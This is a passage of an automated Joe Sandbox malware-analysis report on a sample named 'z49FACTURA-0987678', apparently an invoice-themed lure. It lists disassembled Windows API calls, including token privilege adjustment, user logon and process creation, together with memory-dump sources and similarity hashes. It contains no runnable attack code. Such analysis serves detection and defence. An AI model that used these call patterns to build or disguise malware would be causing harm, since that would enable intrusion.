• GetWindowLongW.USER32(?,000000EC), ref: 00F5CA84
• NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00F0B995,?,?,?,?), ref: 00F5CAB2
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: 6438c823d86199316c4e0ebc2cbafec85caea7307e5ae0abe460a59fa01362d4
• Instruction ID: e7fb10ad9e83606a1127df7a2d0ae2e920668175b14035ef641c15e7df13b7ca
• Opcode Fuzzy Hash: 6438c823d86199316c4e0ebc2cbafec85caea7307e5ae0abe460a59fa01362d4
• Instruction Fuzzy Hash: 3EE04F70100318BFEB159F19DC1AFBA3B54EB04752F508115FA56D91E1C6749854A7A0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F28309), ref: 00F281E0
• CloseHandle.KERNEL32(?,?,00F28309), ref: 00F281F2
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 98b5a972f9c193a9629ba5fdc96ab3ea03db0df0d17efb355873070dba2b94e4
• Instruction ID: 70b363aab868733c7f963803a82a6d1cecad1131fa1cd08075e33dfcb70666ab
• Opcode Fuzzy Hash: 98b5a972f9c193a9629ba5fdc96ab3ea03db0df0d17efb355873070dba2b94e4
• Instruction Fuzzy Hash: 68E08631001610AFEB212B20FC04D7377E9EF00311714886DF55580471CB215C91EB10
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,00F64178,00EF8D57,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00EFA15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EFA163
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 57a7fca5790c5fc255ee38962d903c779b39291ad0c992a999068a9a14712872
• Instruction ID: 773c7e12cdaa0b973ac8cb3be7ec47e3d8291cafbdc3c1e0424e9d5612caf2d8
• Opcode Fuzzy Hash: 57a7fca5790c5fc255ee38962d903c779b39291ad0c992a999068a9a14712872
• Instruction Fuzzy Hash: 9FB0923105430CABEA002F91ED09B893F68EB46AA3F4040A0F70D84070CB625454AA91
Strings
• Variable must be of type 'Object'., xrefs: 00F13E62
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
• Opcode ID: 3ae0901643491a8e9ae3ef23bb82fc6f979ca0aafdc90be60baa190f7b0932b3
• Instruction ID: 2bfa8256ebb9ebd3e7cc46a97f1d4afbc01aec6af3bf731577d378f9503c035e
• Opcode Fuzzy Hash: 3ae0901643491a8e9ae3ef23bb82fc6f979ca0aafdc90be60baa190f7b0932b3
• Instruction Fuzzy Hash: F0A28D75A00209CFCB24DF58C884AAEB7B2FF59314F24905AE816AF351D775ED82DB90
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 973b818caf853693d0abb8b596f240d48de94d18c6ac64689341cded386dfcc0
• Instruction ID: 86ef890d6e9fc176fb77bff4d2e6e00188c0198ae5b43abdcd3b958aa2355bd6
• Opcode Fuzzy Hash: 973b818caf853693d0abb8b596f240d48de94d18c6ac64689341cded386dfcc0
• Instruction Fuzzy Hash: 43321721D29F494DD723A634D832335A248AFF73D8F15D737F829B5AAAEB68C4835100
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 327ecc85c2e7882bea7a083c8916d354587f037da265b539810d70441146f086
• Instruction ID: b2d063f057b0c07ad353ce43728dacf1b95d2c76df70a9a185174e396a5dff27
• Opcode Fuzzy Hash: 327ecc85c2e7882bea7a083c8916d354587f037da265b539810d70441146f086
• Instruction Fuzzy Hash: 58B12130D2AF444DD32396398836336B64CAFBB2C5F51D71BFC2670E62EB6285836641
APIs
• __time64.LIBCMT ref: 00F3889B
  • Part of subcall function 00EF520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F38F6E,00000000,?,?,?,?,00F3911F,00000000,?), ref: 00EF5213
  • Part of subcall function 00EF520A: __aulldiv.LIBCMT ref: 00EF5233
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
• Opcode ID: 49b2e9c5917fd49cb74793c75d9c84f993cf17591cec9884df7d94996addab3a
• Instruction ID: 2b8db80169412e2c97880db0942db08bac38b9757f6c13ef73d2efe7123103db
• Opcode Fuzzy Hash: 49b2e9c5917fd49cb74793c75d9c84f993cf17591cec9884df7d94996addab3a
• Instruction Fuzzy Hash: 9021B432A35610CBC729CF25D841A52B3E1EFA5321F698E6DE1F5CB2D0CA34B905DB54
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00F5D838
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 181687a8148050b496596d2506915104216aacdeb82e6c4a25085d10ddc4a069
                                                                            • Instruction ID: 8b3d8d3c6f0e1f06aeb6abab1c0678efaf0ee6b260fad8e6e65052f2b2498238
                                                                            • Opcode Fuzzy Hash: 181687a8148050b496596d2506915104216aacdeb82e6c4a25085d10ddc4a069
                                                                            • Instruction Fuzzy Hash: D3112735205215ABEB355A2CCC06F7A3704D745B22F244315FF219B6E2CA649D09B3A5
                                                                            APIs
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00F0B952,?,?,?,?,00000000,?), ref: 00F5D432
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 7da8356fde353a66b0cbcfe44a779c111faa3dee9b72f52ce7be94c5b889aac6
                                                                            • Instruction ID: bccc9719ddfb54b78f494df6b651200b9688fe3dfea85f6b02d3dcc3dda91fee
                                                                            • Opcode Fuzzy Hash: 7da8356fde353a66b0cbcfe44a779c111faa3dee9b72f52ce7be94c5b889aac6
                                                                            • Instruction Fuzzy Hash: 3001F531A01118ABDF24CF25C845AB93B91EF46333F444125FF061B291C331BC56B7A0
                                                                            APIs
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00F5BCA3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallLongProc
                                                                            • String ID:
                                                                            • API String ID: 4084987330-0
                                                                            • Opcode ID: f52784283595eda32559d60f78006bb5e686217dd7ceb53efe1e468319988022
                                                                            • Instruction ID: 7ffed51490e29c2041da7d1c2e2cb0c5b221cf2e2082de9298ae793d92caf398
                                                                            • Opcode Fuzzy Hash: f52784283595eda32559d60f78006bb5e686217dd7ceb53efe1e468319988022
                                                                            • Instruction Fuzzy Hash: 8BF04F3110010CEFCF059F54ED48D793BA6EB08362B044155FE114A271CB329D60FB94
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00ED1B04,?,?,?,?,?), ref: 00ED18E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 25aa69028b5461da1586db66a67993f4d1895cfc93666cab34f117ae3031eed7
                                                                            • Instruction ID: 336da070eb7de95d33891e7d7acb87728fe8d15fc2a925c0f7128757c584db01
                                                                            • Opcode Fuzzy Hash: 25aa69028b5461da1586db66a67993f4d1895cfc93666cab34f117ae3031eed7
                                                                            • Instruction Fuzzy Hash: 2BF0BE3420021CEFDF19DF44D85096A37E2EB00310F50412AF9524B3A1C732D960FB50
                                                                            APIs
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F5C8FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogNtdllProc_
                                                                            • String ID:
                                                                            • API String ID: 3239928679-0
                                                                            • Opcode ID: f6b50bcc337b50ba83ce85146e2cfc86d036c8e1006e00895939df63eba62449
                                                                            • Instruction ID: f6b775f0700774b53d047483fe03940dce86a172be35d42d816e8c09cabbb7f9
                                                                            • Opcode Fuzzy Hash: f6b50bcc337b50ba83ce85146e2cfc86d036c8e1006e00895939df63eba62449
                                                                            • Instruction Fuzzy Hash: 8EF06D31210358AFDF22DF58DC05FD63B95EB09721F544059BA21672E2CB706924E7A0
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F28389), ref: 00F287D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: 3454ffed5b3edd72482db6cd30441e7d62085984008ae028e550d629f3d3742a
                                                                            • Instruction ID: 013e373cf8746083044adfe4071c1e41d614ab43da31d205dfa4d477e084761f
                                                                            • Opcode Fuzzy Hash: 3454ffed5b3edd72482db6cd30441e7d62085984008ae028e550d629f3d3742a
                                                                            • Instruction Fuzzy Hash: BDD05E3226060EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                            APIs
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00F0B9BC,?,?,?,?,?,?), ref: 00F5C934
                                                                              • Part of subcall function 00F5B635: _memset.LIBCMT ref: 00F5B644
                                                                              • Part of subcall function 00F5B635: _memset.LIBCMT ref: 00F5B653
                                                                              • Part of subcall function 00F5B635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F96F20,00F96F64), ref: 00F5B682
                                                                              • Part of subcall function 00F5B635: CloseHandle.KERNEL32 ref: 00F5B694
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                            • String ID:
                                                                            • API String ID: 2364484715-0
                                                                            • Opcode ID: 4d3be39880c4b2f8a64117d640a1c9e618ec7b46abec760dd17d7a2803acbe5c
                                                                            • Instruction ID: d12ad08088453a0e7a05fd86c0a53929d9adc81ec2c41dba49a241d95026b2df
                                                                            • Opcode Fuzzy Hash: 4d3be39880c4b2f8a64117d640a1c9e618ec7b46abec760dd17d7a2803acbe5c
                                                                            • Instruction Fuzzy Hash: BAE01232110208EFCB02AF44DC10E853BA1FB08712F018051FE06072B2C731A824EF90
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00ED1AEE,?,?,?), ref: 00ED16AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 86ff626261883dec076b12474eadab2a0c48d6617114c3ed6f73aced52d3e8e5
                                                                            • Instruction ID: cff2e10c4bacac71db512f384e57f831da27c795ca68783881b2099be3805940
                                                                            • Opcode Fuzzy Hash: 86ff626261883dec076b12474eadab2a0c48d6617114c3ed6f73aced52d3e8e5
                                                                            • Instruction Fuzzy Hash: 9EE0EC35100208FBCF16AF90DC11E643B66FB58710F508459FA551A2A2CA32A522EB50
                                                                            APIs
                                                                            • NtdllDialogWndProc_W.NTDLL ref: 00F5C8B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogNtdllProc_
                                                                            • String ID:
                                                                            • API String ID: 3239928679-0
                                                                            • Opcode ID: 455a74aa3d2f6ab3028ee1b9006f4927ef8c87c557331da702417570e20b4350
                                                                            • Instruction ID: c622562ad272c04ca236e0d0281462004aba9451ffce55c53ea9efefe3759ba9
                                                                            • Opcode Fuzzy Hash: 455a74aa3d2f6ab3028ee1b9006f4927ef8c87c557331da702417570e20b4350
                                                                            • Instruction Fuzzy Hash: F6E0E23521020CEFCB02DF88D844D863BA5AB1D700F014094FA0547262C771A820EBA1
                                                                            APIs
                                                                            • NtdllDialogWndProc_W.NTDLL ref: 00F5C885
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogNtdllProc_
                                                                            • String ID:
                                                                            • API String ID: 3239928679-0
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                              • Part of subcall function 00ED201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00ED20D3
                                                                              • Part of subcall function 00ED201B: KillTimer.USER32(-00000001,?,?,?,?,00ED16CB,00000000,?,?,00ED1AE2,?,?), ref: 00ED216E
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00ED1AE2,?,?), ref: 00ED16D4
                                                                            Memory Dump Source
